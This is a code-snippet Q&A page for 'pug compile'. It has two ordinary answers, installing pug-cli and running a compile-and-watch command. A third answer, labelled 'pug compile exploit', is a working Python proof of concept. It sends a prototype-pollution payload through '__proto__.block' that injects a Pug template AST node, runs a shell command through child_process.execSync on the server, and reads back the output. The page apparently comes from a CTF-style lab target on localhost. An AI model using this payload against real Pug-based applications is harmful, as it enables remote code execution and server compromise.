Answers for "pug compile"

0

pug compile

npm i -g pug-cli
Posted by: Guest on February-25-2022
0

pug compile

pug -w . -o ./html -P
Posted by: Guest on February-25-2022
-1

pug compile exploit

import requests

ENDPOINT = 'http://127.0.0.1:1337/api/submit'
OUTPUT = 'http://127.0.0.1:1337/static/out'

request = requests.post(ENDPOINT, json = {
   "artist.name":"Gingell",
       "__proto__.block": {
           "type":"Text",
           "line":"process.mainModule.require('child_process').execSync('ls > /app/static/out')"
       }
})
print (request.text)
print (requests.get(OUTPUT).text)
Posted by: Guest on November-30-2021

Browse Popular Code Answers by Language